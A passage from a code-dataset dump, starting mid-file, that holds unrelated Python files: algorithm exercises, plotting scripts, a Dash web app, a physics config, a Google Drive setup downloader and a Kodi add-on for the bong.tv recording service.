point = []\n total_x = 0\n total_y = 0\n\n for _ in range(N):\n x, y = list(map(int, input().split()))\n point.append([x,y])\n total_x += x\n total_y += y\n\n ret = sys.maxsize\n com = list(itertools.combinations(point, int(N/2)))\n com_len = int(len(com)/2)\n for element in com[:com_len]:\n element = list(element)\n\n x1_total = 0\n y1_total = 0\n for x1, y1 in element:\n x1_total += x1\n y1_total += y1\n\n x2_total = total_x - x1_total\n y2_total = total_y - y1_total\n\n ret = min(ret, math.sqrt((x1_total - x2_total) ** 2 + (y1_total - y2_total) ** 2))\n print(ret)","sub_path":"Algorithm/BOJ/[1007] 벡터 매칭.py","file_name":"[1007] 벡터 매칭.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"642170985","text":"import os\nfrom google_drive_downloader import GoogleDriveDownloader as gdd\n\n\ndef getOSXsrc():\n gids = {\n '1mKgmZ6cJqXFQyVyWshvVKCg4qEVQOEm-':'osx-chrome-releases',\n '108NRuz7EZ8Z2XO1bn5VCJm4rg5P-mWU9':'osx-firefox-releases'\n }\n for gid,name in gids.items():\n dwFileName = os.path.abspath(os.path.join(os.path.dirname(__file__),gid))\n fileName = os.path.abspath(os.path.join(os.path.dirname(__file__), name))\n if not os.path.exists(fileName):\n gdd.download_file_from_google_drive(\n file_id=gid,\n dest_path=dwFileName,\n unzip=True\n )\n os.remove(dwFileName)\n\ndef getSeleniumSrv():\n print(\"get\")\n fileName = os.path.join(os.path.dirname(__file__),'selenium-java.zip')\n fileName_extracted = os.path.join(os.path.dirname(__file__), 'selenium-server-standalone-3.11.0.jar')\n if not os.path.exists(fileName_extracted):\n gdd.download_file_from_google_drive(\n file_id='1IIAWfCV-uHSW75cZRoc5VQd2ZiPDSlxN',\n dest_path=os.path.abspath(fileName),\n unzip=True\n )\n os.remove(fileName)\n return True\n\n","sub_path":"Selenium/osx/getSrc.py","file_name":"getSrc.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"3353920","text":"\"\"\"Some people are standing in a row in a park. There are trees between\nthem which cannot be moved. Your task is to rearrange the people by their\nheights in a non-descending order without moving the trees. People can be very tall!\n\nExample\n\nFor a = [-1, 150, 190, 170, -1, -1, 160, 180], the output should be\nsortByHeight(a) = [-1, 150, 160, 170, -1, -1, 180, 190].\"\"\"\n\n\n# newbie - Zimbra\ndef sortByHeight(a):\n q = sorted(a)\n lista = list()\n s = q.count(-1)\n for x, y in enumerate(a):\n if y == -1:\n lista.append(-1)\n s -= 1\n else:\n lista.append(q[x + s])\n return lista\n\n\nprint(sortByHeight([-1, 150, 190, 170, -1, -1, 160, 180]))\n","sub_path":"CodeFights.com/Sort by Height.py","file_name":"Sort by Height.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"102652737","text":"import dash #creating a webpage\nimport dash_core_components as dcc #visual component\nimport dash_html_components as html\nimport plotly.graph_objs as go #employ graphics\nfrom dash.dependencies import Input, Output, State #calling the library\n\n########### Define your variables ######\n\nmyheading1='Which Lego piece you will choose?'\ntabtitle = 'Lego Pieces'\nlist_of_types=['Brick', 'Plate', 'Tile'] #list_of_colors\nlist_of_sizes=['1X2', '2X2', '2X4'] #list_of_numbers\nsourceurl = 'https://github.com/caroleonor/dash-callbacks-multi-input/edit/master/app.py'\ngithublink = 'https://brickarchitect.com/book/bricks/'\n\n\n########## Set up the chart\n\n########### Initiate the app (setting up html and css)\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) #for dash to get the url to display the css style sheet\nserver = app.server\napp.title=tabtitle\n\n########### Set up the layout\n\napp.layout = html.Div(children=[ \n html.H1(myheading1),\n html.Div([\n html.Div([\n dcc.RadioItems( #little circle is radio button\n id='pick-a-type',\n options=[\n {'label':list_of_types[0], 'value':list_of_types[0]},\n {'label':list_of_types[1], 'value':list_of_types[1]},\n {'label':list_of_types[2], 'value':list_of_types[2]},\n ],\n value='choose', #\"choose\" is the action of \"user click\"\n ),\n ],className='two columns'),\n html.Div([\n dcc.RadioItems(\n id='pick-a-size',\n options=[\n {'label':list_of_sizes[0], 'value':list_of_sizes[0]},\n {'label':list_of_sizes[1], 'value':list_of_sizes[1]},\n {'label':list_of_sizes[2], 'value':list_of_sizes[2]},\n ],\n value='one',\n ),\n ],className='two columns'),\n html.Div([\n html.Div(id='your_output_here', children=''), #where the output in the html going to be displayed\n ],className='eight columns'), #calling a section of css format\n ],className='twelve columns'),\n html.Br(),\n html.A('Code on Github', href=githublink),\n html.Br(),\n html.A(\"Data Source\", href=sourceurl),\n ]\n)\n\n########## Define Callback\n\n@app.callback(Output('your_output_here', 'children'),\n [Input('pick-a-type', 'value'),\n Input('pick-a-size', 'value')])\ndef radio_results(type_you_picked, size_you_picked):\n image_you_chose=f'{type_you_picked}-{size_you_picked}.jpg'\n return html.Img(src=app.get_asset_url(image_you_chose), style={'width': '100', 'height': '75'}),\n\n############ Deploy\nif __name__ == '__main__':\n app.run_server()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522006297","text":"# Read File\nimport numpy as np\nimport pandas as pd\n\n\ndef read(file_name):\n data_aux = pd.read_csv(file_name)\n y = data_aux['real']\n x = data_aux['imag']\n chi = data_aux['chi']\n\n return y.array, x.array, chi.array\n\ny, x, z = read('Let.csv')\n#y, x, z = np.genfromtxt(r'data.dat', unpack=True)\n\n#Plot Contour\nimport matplotlib.pyplot as plt\nimport scipy.interpolate\nimport matplotlib.cm as cm\n\nfig = plt.figure(figsize=(6.5, 5))\n\n#print(z)\nsys = plt.tricontourf(x,y,z,levels=[min(z), min(z)+2.30,min(z)+6.18,min(z)+11.83], cmap = 'Reds')\n\nproxy = [plt.Rectangle((0,0),1,1,fc = pc.get_facecolor()[0]) \n for pc in sys.collections]\n\n\n#sys.collections[0].set_label('1 $\\\\sigma$')\n#sys.collections[1].set_label('2 $\\\\sigma$')\n#sys.collections[2].set_label('3 $\\\\sigma$')\n\nplt.legend(proxy, ['1$\\\\sigma$','2$\\\\sigma$','3$\\\\sigma$'],loc='upper right')\n\ny_axis_NAME='Re$\\{[\\\\tilde{L}]_{e\\\\mu}\\}$'\nx_axis_NAME='Im$\\{[\\\\tilde{L}]_{e\\\\mu}\\}$'\n\nplt.xlim([-1.0,1.0])\nplt.ylim([-1.0,1.0])\nplt.ylabel(y_axis_NAME)\nplt.xlabel(x_axis_NAME)\n\nplt.title('Bugey - NSI limits')\nplt.savefig('Let.pdf') \nplt.show()\n","sub_path":"plot/contour_plot_nsi.py","file_name":"contour_plot_nsi.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"261750571","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n # Could hash all pointers in a dict - O(n) space\r\n # Or just use two pointers - O(1) space\r\n # aka Floyd's cycle finding algorithm\r\n ptr1 = head\r\n ptr2 = head\r\n\r\n while ptr1 and ptr2 and ptr2.next:\r\n # Advance one pointer by 1 node\r\n # and the other by 2 nodes\r\n ptr1 = ptr1.next\r\n ptr2 = ptr2.next.next\r\n\r\n # If they are the same ptr, there is a cycle\r\n if ptr1 == ptr2:\r\n return True\r\n\r\n return False\r\n","sub_path":"linked-list-cycle.py","file_name":"linked-list-cycle.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"508677384","text":"import FWCore.ParameterSet.Config as cms\n\neventWeightDileptonModelVariation = cms.EDProducer(\"EventWeightDileptonModelVariation\",\n ttGenEvent = cms.InputTag('genEvt'),\n weightVariable = cms.string('toppt'), #valid values: toppt, topeta, toprapidity, ttbarmass, ttbarmasslandau\n slope = cms.double(0),\n weight1x = cms.double(200), #position where weight is 1\n minWeight = cms.double(0.1), #low cut-off, at least 0.1 event weight\n maxWeight = cms.double(2), #high cut-off, at most 2 event weight\n landauMPV = cms.double(4.00132e+02),\n landauSigma = cms.double(3.63534e+01),\n landauMoveX = cms.double(50)\n \n)\n\n\n\n","sub_path":"TopAnalysis/TopUtils/python/EventWeightDileptonModelVariation_cfi.py","file_name":"EventWeightDileptonModelVariation_cfi.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"433588846","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nPosiciones:\n0 -> Step\n1 -> state\n2 (3) -> interval [no usar]\n4 -> reward\n5 -> acc_reward\n6 -> freqpos\n7 -> frequency\n8 -> power\n\"\"\"\n\ndef get_file_data(csv, pos):\n csvf = open(csv, 'r')\n csvflines = csvf.readlines()\n csvf.close()\n \n data = [] \n for line in csvflines[1:]:\n values = line.strip('\\n[]').split(',')\n data.append(float(values[pos]))\n\n # frecuencia en MHz:\n if pos == 7:\n data[-1] = data[-1] / 1000\n \n return data\n\n\n####################\n### COMP AGENTES ###\n####################\n\n\"\"\"\nEntornos: 1, 2, 3\nÉpoca: 5\nTests: 1 (cap:52.5)\n\nDato: potencia\nVariable: entorno\nPotencia objetivo: 52.5 W\n\"\"\"\n\npos = 8 # power\nX = range(0, 201)\n\n# Parámetros de los datos.\nenvs = [1, 2, 3]\npaths = [ f'./FinalEnv0{e}/' for e in envs ]\nchkpt = 5\n\ntest_num = 1\ntests = [ p + f'test-0{test_num}' for p in paths ]\n\ntarget = 52.5\n#################\n# Etiquetas de cada plot.\nlabel_tag = 'env'\nlabels = [ f'{label_tag}: {e}' for e in envs ]\n\n# Color de cada plot.\nclrs = ['blue', 'aquamarine', 'lime']\n\n# Ticks de los ejes.\nmaxY = 18\nstepY = 1\nXticks = np.arange(0, 201, 10)\nYticks = np.arange(0, maxY, stepY)\n\n# Figura\nfig = plt.figure(figsize=(8,6), dpi=150)\nax = fig.add_subplot(111)\n\n# Por cada agente.\nfor test, clr, label in zip(tests, clrs, labels):\n # Por cada test (freq inicial)\n bundle = []\n for it in range(15):\n data = get_file_data(\n test + f'/checkpoint-{chkpt}/iter-{it}.csv',\n pos\n )\n\n bundle.append( [ abs(x - target) for x in data ] )\n \n # Media de los tests.\n bundle = np.array(bundle)\n graph = bundle.mean(axis = 0)\n\n ax.plot(\n X, graph,\n color = clr,\n label = label,\n linestyle = '-',\n linewidth = 0.75,\n marker = '',\n alpha = 1.0\n )\n\n# Línea horizontal con el dato objetivo.\n\"\"\" ax.axhline(\n y = 0,\n xmin = 10 / 220,\n xmax = 1 - (10 / 220),\n color = targetclr,\n linestyle = '-',\n linewidth = 1.0\n) \"\"\"\n\n\n# Eje X\nax.set_xlabel('Time (inference step)')\nax.set_xticks(Xticks)\nax.set_xticklabels(Xticks, rotation = 45)\n\n# Eje Y\nax.set_ylabel('Average power error (W)')\nax.set_yticks(Yticks)\n\n# Grid de la gráfica\nax.grid(\n alpha = 0.25,\n linestyle = ':'\n)\n\n# Leyenda\nax.legend()\n\n# Ruta de guardado\nplt.savefig('6-9.png', bbox_inches='tight')","sub_path":"6-9.py","file_name":"6-9.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"119317432","text":"\n\n\n\n\nt = int(input())\n\nfor _ in range(t):\n n = int(input())\n a = list(map(int,input().split()))\n \n Sum = [0]*(n + 1)\n cnt = [0]*(8001)\n\n for i in range(n):\n Sum[i + 1] = Sum[i] + a[i]\n\n for i in range(n):\n for j in range(i + 2,n + 1):\n if Sum[j] - Sum[i] <= 8000:\n cnt[Sum[j] - Sum[i]] += 1\n\n ans = 0\n for x in a:\n ans += int(cnt[x] > 0)\n print(ans)\n\n","sub_path":"codeforces/Div4_640/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346893061","text":"#!/usr/bin/python3\nfrom sys import stdin, maxsize\nfrom heapq import heappush, heappop\n\ndbg = False\nif dbg:\n from tracemalloc import start, stop, get_traced_memory\n start () # for tracing memory allocation\n\ndef main ():\n read = stdin.readline\n n, m = map (int, read ().split ())\n g = dict ()\n wd = dict () # weights of edges dict\n dd = dict () # distance dict\n dist = 0\n u, v, w = map (int, read ().split ())\n g [u] = [v]\n wd [(u, v)] = [w]\n dd [u] = maxsize\n dd [v] = maxsize\n if dbg: mxwd = 0\n for m_ in range (1, m):\n u, v, w = map (int, read ().split ())\n if (u, v) in wd:\n wd [(u, v)].append (w)\n if dbg and len (wd [(u, v)]) > mxwd: mxwd = len (wd [(u, v)])\n else:\n wd [(u, v)] = [w]\n if u in g: g [u].append (v)\n else:\n g [u] = [v]\n dd [u] = maxsize\n dd [v] = maxsize\n k = int (read ()) # number of special vertices\n svl = set (map (int, read ().split ())) # special vertices set\n x, y = map (int, read ().split ())\n #print (\"x y\", x, y, g [x])\n if x in svl and y in svl: print (-1); return\n dd [x] = 0\n wd [(0, x)] = [0]\n hp = []\n reachedy = False\n s = x if x in svl else 0\n if dbg:\n par = dict ()\n par [(x, 0, 0)] = (0, 0, 0)\n last = (x, 0, 0)\n #hc = dict ()\n mx = 0\n used = set ()\n if x == y:\n if s: print (0)\n else: print (-1)\n return\n if x not in g: print (-1); return\n\n '''# remove unneccesary edges to overcome \"Memory limit exceeded\"\n print (len (wd))\n seen = set ()\n s = 0\n if dbg:\n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n\n #bfs from x to y\n uy = False\n from collections import deque\n qu = deque ()\n qu.append (x)\n while qu:\n u = qu.popleft ()\n if u in svl: s = u\n if u == y: uy =True\n if uy and s: break\n if u in seen or u not in g: continue\n seen.add (u)\n for v in g [u]:\n qu.append (v)\n if dbg: print (\"n seen\", n, len (seen))\n\n # bfs from y to x\n ux = False\n seen2 = set ()\n qu = deque ()\n qu.append (y)\n while qu:\n u = qu.popleft ()\n if u in svl: s = u\n if u == x: ux =True\n if ux and s: break\n if u in seen2 or u not in g: continue\n seen2.add (u)\n for v in g [u]:\n qu.append (v)\n seen |= seen2\n if dbg:\n print (\"n seen2\", n, len (seen2))\n print (\"seen total\", len (seen))\n \n to_remove = []\n for u, v in wd:\n if u not in seen or v not in seen: to_remove.append ((u, v))\n for uv in to_remove:\n del wd [uv]\n if dbg:\n print (len (wd))\n print (96212 in seen, 98737 in seen)\n #return\n\n if dbg:\n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n #return'''\n\n for v in g [x]:\n if s and v in svl: continue\n if dbg: used.add (v)\n for vw in sorted (wd [(x, v)], reverse = True):\n ndist = dist + vw\n if dbg: print (\"pre\", x, v, vw, ndist)\n if (v != y or v == y and s or v == y and v in svl):\n if ndist < dd [v]:\n dd [v] = ndist\n heappush (hp, (ndist, vw, v, x, s))\n if dbg:\n print (\"pre push\", ndist, vw, v, x, s)\n if (v, x, vw) not in par or par [(v, x, vw)][0] != x:\n par [(v, x, vw)] = (x, 0, 0)\n #if (v, x, 0) in hc: hc [(v, x, 0)] += 1\n #else: hc [(v, x, 0)] = 1\n elif v == y:\n heappush (hp, (ndist, vw, v, x, s))\n if dbg:\n print (\"pre push extra\", ndist, vw, v, x, s)\n if (v, x, vw) not in par or par [(v, x, vw)][0] != x:\n par [(v, x, vw)] = (x, 0, 0)\n #if (v, x, 0) in hc: hc [(v, x, 0)] += 1\n #else: hc [(v, x, 0)] = 1\n hps = set () # control (v, u)'s on heap with s\n seen = dict ()\n while hp:\n if dbg and len (hp) > mx: mx = len (hp)\n dis, lw, u, parent, s = heappop (hp)\n if not s: s = u if u in svl else 0\n if dbg and u == 19: print (\"19 reached\", dis, s)\n dist = dis\n if u == y:\n if s:\n reachedy = True;\n break\n if dbg: print (\"next\", u, parent, dis, end = \" \")\n if u not in g: continue\n lw05 = .5 * lw; lw2 = 2 * lw\n for v in g [u]:\n if (s and v in svl) or (v, u, parent) in seen and seen [(v, u, parent)] > 1: continue\n if (v, u, parent) in seen: seen [(v, u, parent)] += 1\n else: seen [(v, u, parent)] = 1\n if (u, v) not in wd: continue\n for vw in sorted (wd [(u, v)], reverse = True):\n if vw < lw05: break\n ndist = dist + vw\n if dbg: print (\" \", u, v, lw05, vw, lw2, s, dd [v], ndist)\n if lw05 <= vw <= lw2:\n if dbg: used.add ((u, v, vw))\n if v != y or v == y and s or v == y and v in svl:\n if ndist < dd [v]:\n dd [v] = ndist\n heappush (hp, (ndist, vw, v, u, s))\n if dbg:\n print (\"push\", ndist, vw, v, u, s)\n if (v, u, vw) not in par or par [(v, u, vw)][0] != u:\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n elif s and (v, u) not in hps:# and ndist < 22099:\n if dbg:\n print (\"push additional s\", dd [v], \"->\", ndist, vw, v, u, s)\n if (v, u, vw) not in par or par [(v, u, vw)][0] != u:\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n #dd [v] = ndist\n hps.add ((v, u))\n heappush (hp, (ndist, vw, v, u, s))\n elif v == y:\n heappush (hp, (ndist, vw, v, u, s))\n if dbg:\n if (any (i in svl for i in g [v])) and ((v, u, vw) not in par or par [(v, u, vw)][0] != u):\n print (\"extra par [(\", v, \",\", u, \",\", vw, \")] = (\", u, \",\", parent, \",\", lw, \")\", dd [v], ndist, s)\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n if reachedy: print (dist)\n else: print (-1)\n if dbg: \n total = 0\n print (\"final current path reversed (node, parent, distance) from\", y, \"to\", x) #,par)\n u = last\n total += u [2]\n print (f\"{u}\", end = \" \")\n try:\n while par [u][0]:\n u = par [u]\n total += u [2]\n print (f\"{u}\", end = \" \")\n except IndexError: print (u, par [u])\n print (\" total:\", total)\n #print (hc)\n print (\"length heap\", mx)\n print (\"mxwd length\", mxwd)\n print (\"m / used edges\", m, \"/\", len (used))\n \n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n\nif __name__ == \"__main__\":\n main ()\n if dbg: stop () # for tracing memory allocation","sub_path":"_minimum_valid_path.py","file_name":"_minimum_valid_path.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133212983","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2015 Christian Maugg\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\n\nCHANGELOG\n=========\n\n2.0\n===\n* first public release\n\n\"\"\"\n\nfrom xbmcswift2 import xbmc\nfrom xbmcswift2 import xbmcgui\n\nimport functools\nimport operator\nimport os\nimport sys\nimport time\nimport xbmcswift2\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), 'resources', 'lib'))\n\nimport pybongtvapi\n\nplugin = xbmcswift2.Plugin()\naddon_icon = plugin.addon.getAddonInfo('icon')\naddon_name = plugin.addon.getAddonInfo('name')\n\npybongtvapi.DEFAULT_COOKIE_DIR = os.path.join(plugin.storage_path, '..', '.pybongtvapi', 'cookies')\n\nCONTENT_TYPES = VIDEOS, EPISODES, MOVIES = 'videos', 'episodes', 'movies'\n\n# xbmc translation identifiers\n# the addon's translation identifiers\nTR_AUTHORIZATION_ERROR = 30000 # en: Authorization Error! de: Anmeldung fehlgeschlagen!\nTR_UPDATE_CREDENTIALS = 30001 # en: Please update your BONG.TV username and password, de: Bitte bong.tv-Benutzernamen und -Passwort aktualisieren\nTR_BONGSPACE = 30002 # en: BongSpace de: BongSpace\nTR_BONGGUIDE = 30003 # en: BongGuide de: BongGuide\nTR_SEARCH_BROADCASTS = 30004 # en: Search broadcasts de: Suche Sendungen\nTR_X_BROADCASTS_RECORDED = 30005 # en: {0} broadcasts recorded de: {0} Sendungen aufgenommen\nTR_MANAGE_X_BROADCASTS = 30006 # en: Manage {0} broadcasts de: {0} Sendungen verwalten\nTR_NO_RECORDINGS_FOUND = 30007 # en: No recordings found! de: Keine Aufnahmen gefunden!\nTR_TITLE_DELETE_RECORDING = 30008 # en: Delete Recording? de: Aufnahme löschen?\nTR_DELETE_RECORDING = 30009 # en: Delete recording \"{0}\"? de: Aufnahme \"{0}\" löschen?\nTR_CANNOT_DELETE_RECORDING = 30010 # en: Cannot delete recording \"{0}\"! de: \"{0}\" kann nicht gelöscht werden!\nTR_RECORDING_DELETED = 30011 # en: \"{0}\" deleted successfully. de: \"{0}\" erfolgreich gelöscht.\nTR_TITLE_RECORD_BROADCAST = 30012 # en: Record broadcast? de: Aufnahme tätigen?\nTR_RECORD_BROADCAST = 30013 # en: Record broadcast \"{0}\"? de: Sendung \"{0}\" aufzeichnen?\nTR_CANNOT_RECORD_BROADCAST = 30014 # en: Cannot record broadcast \"{0}\"! de: \"{0}\" kann nicht aufgezeichnet werden!\nTR_WILL_RECORD_BROADCAST = 30015 # en: \"{0}\" is scheduled for recording de: \"{0}\" wird aufgezeichnet\nTR_NEXT_DAYS_BROADCASTS = 30016 # en: Broadcasts from {0} de: Sendungen vom {0}\nTR_PREVIOUS_DAYS_BROADCASTS = 30017 # en: Broadcasts from {0} de: Sendungen vom {0}\nTR_LIST_OF_BROADCASTS = 30018 # en: List of channels de: Senderliste\nTR_TITLE_SEARCH_MATCHING_BROADCASTS = 30019 # en: Search broadcasts de: Suche Sendungen\nTR_X_MATCHING_BROADCASTS_FOUND = 30020 # en: Found {0} matching broadcasts for search term \"{1}\" de: {0} passende Sendungen für den Suchbegriff \"{1}\" gefunden\nTR_NO_MATCHING_BROADCASTS_FOUND = 30021 # en: No matching broadcasts found for search term \"{0}\" de: Keine passenden Sendungen für den Suchbegriff \"{0}\" gefunden!\n\n\n# xbmc utils/helpers\ndef get_view_mode_id():\n if plugin.get_setting('force_view_mode', converter=bool):\n return plugin.get_setting('view_mode_id', converter=int)\n\n\ndef get_content_type():\n if plugin.get_setting('force_content_type', converter=bool):\n return plugin.get_setting('content_type', converter=str)\n\n\ndef use_extended_broadcast_details():\n return plugin.get_setting('use_extended_broadcast_details', converter=bool)\n\n\ndef normalize_title(broadcast, include_time=True, include_channel_name=False):\n label = ('{0.title}: {0.subtitle}'.format(broadcast) if broadcast.is_tvshow() else broadcast.title)\n if include_time:\n label = time.strftime('%d.%m, %H:%M: ', broadcast.starts_at) + label\n if include_channel_name:\n label = (broadcast.channel_name + (', ' if include_time else ': ') + label)\n return label\n\n\ndef new_broadcast_item(broadcast, path=None, include_time=True, include_channel_name=False):\n label = normalize_title(broadcast, include_time=include_time, include_channel_name=include_channel_name)\n broadcast_details = dict(\n genre=', '.join(broadcast.categories),\n year=broadcast.production_year,\n episode=broadcast.episode,\n season=broadcast.season,\n plot=broadcast.plot if use_extended_broadcast_details() else broadcast.outline,\n plotoutline=broadcast.outline,\n title=broadcast.subtitle if broadcast.is_tvshow() else broadcast.title,\n duration=broadcast.duration,\n tagline=broadcast.subtitle,\n tvshowtitle=broadcast.title if broadcast.is_tvshow() else None,\n aired=time.strftime('%Y-%m-%d', broadcast.starts_at),\n )\n properties = dict(fanart_image=broadcast.thumb_url)\n return dict(label=label, label2=broadcast.subtitle, icon=broadcast.channel_logo_url, thumbnail=broadcast.thumb_url,\n path=path, properties=properties, info=broadcast_details, info_type='video')\n\n\ndef new_recording_item(recording, path=None, include_time=True, include_channel_name=False):\n item = new_broadcast_item(recording, path=path, include_time=include_time,\n include_channel_name=include_channel_name)\n if recording.is_recorded() and path is None:\n item.update(is_playable=True, path=recording.url)\n elif recording.is_recorded() and path is not None:\n item.update(label=' * ' + item['label'])\n return item\n\n\ndef new_channel_item(channel, path):\n return dict(label=channel.name, icon=channel.logo_url, thumbnail=channel.logo_url, path=path, info_type='video')\n\n\ndef finish(items, content_type=None, view_mode_id=None):\n if content_type in CONTENT_TYPES or get_content_type():\n plugin.set_content(content_type if content_type in CONTENT_TYPES else get_content_type())\n return plugin.finish(items, view_mode=view_mode_id or get_view_mode_id())\n\n\ndef notify(msg):\n if msg and isinstance(msg, basestring):\n xbmc.executebuiltin('Notification(\"' + addon_name + '\", \"' + msg + '\", \"5000\", \"' + addon_icon + '\")')\n\n\ndef refresh_view(msg=None):\n if msg and isinstance(msg, basestring):\n notify(msg)\n xbmc.executebuiltin('Container.Refresh')\n\n\ndef update_view(url, msg=None):\n if not isinstance(url, basestring):\n raise TypeError()\n if msg and isinstance(msg, basestring):\n notify(msg)\n xbmc.executebuiltin('Container.Update(' + url + ')')\n\n\ndef tr(msg_id, *a, **kw):\n return (plugin.get_string(int(msg_id)) or '').encode('utf-8').format(*a, **kw)\n\n\n# bong.tv utils/helpers\ndef new_api():\n return pybongtvapi.API(credentials=pybongtvapi.UserCredentials(plugin.get_setting('username'),\n plugin.get_setting('password')))\n\n\ndef new_epg():\n return pybongtvapi.EPG(new_api())\n\n\ndef new_pvr():\n return pybongtvapi.PVR(new_api())\n\n\ndef requires_authorization(wrapped):\n def wrapper(*a, **kw):\n for _ in range(3):\n try:\n return wrapped(*a, **kw)\n except pybongtvapi.AuthorizationError:\n xbmcgui.Dialog().ok(tr(TR_AUTHORIZATION_ERROR), tr(TR_UPDATE_CREDENTIALS))\n plugin.open_settings()\n\n return functools.update_wrapper(wrapper, wrapped)\n\n\n@requires_authorization\ndef get_recordings():\n return new_pvr().recordings\n\n\n@requires_authorization\ndef get_channels():\n return new_epg().channels\n\n\n@requires_authorization\ndef get_channel(channel_id):\n return new_epg().get_channel(channel_id)\n\n\n# addon routing\n@plugin.route('/')\ndef page_index():\n items = [\n dict(label=tr(TR_BONGSPACE), path=plugin.url_for('page_pvr')),\n dict(label=tr(TR_BONGGUIDE), path=plugin.url_for('page_epg')),\n dict(label=tr(TR_SEARCH_BROADCASTS), path=plugin.url_for('page_search')),\n ]\n return finish(items)\n\n\n@plugin.route('/pvr')\ndef page_pvr():\n def producer():\n if recorded:\n yield dict(label=tr(TR_X_BROADCASTS_RECORDED, len(recorded)), path=plugin.url_for('page_pvr_recorded'))\n yield dict(label=tr(TR_MANAGE_X_BROADCASTS, len(recordings)), path=plugin.url_for('page_pvr_manage'))\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n recorded = [recording for recording in recordings if recording.is_recorded()]\n if recordings:\n return finish(tuple(producer()))\n else:\n update_view(plugin.url_for('page_index'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/pvr/recorded')\ndef page_pvr_recorded():\n def producer():\n for recorded_recording in recorded:\n yield new_recording_item(recorded_recording)\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n recorded = [recording for recording in recordings if recording.is_recorded()]\n if recorded:\n return finish(tuple(producer()), content_type='movies', view_mode_id=504)\n else:\n update_view(plugin.url_for('page_pvr'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/pvr/manage')\ndef page_pvr_manage():\n def producer():\n for recording in recordings:\n path = plugin.url_for('action_delete_recording', recording_id=recording.recording_id,\n recording_title=normalize_title(recording, include_time=False))\n yield new_recording_item(recording, path=path, include_channel_name=True)\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n if recordings:\n return finish(tuple(producer()), content_type='movies', view_mode_id=504)\n else:\n update_view(plugin.url_for('page_pvr'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/action/delete-recording//')\ndef action_delete_recording(recording_id, recording_title):\n if xbmcgui.Dialog().yesno(tr(TR_TITLE_DELETE_RECORDING), tr(TR_DELETE_RECORDING, recording_title)):\n try:\n new_pvr().delete_recording(int(recording_id))\n except pybongtvapi.Error:\n refresh_view(msg=tr(TR_CANNOT_DELETE_RECORDING, 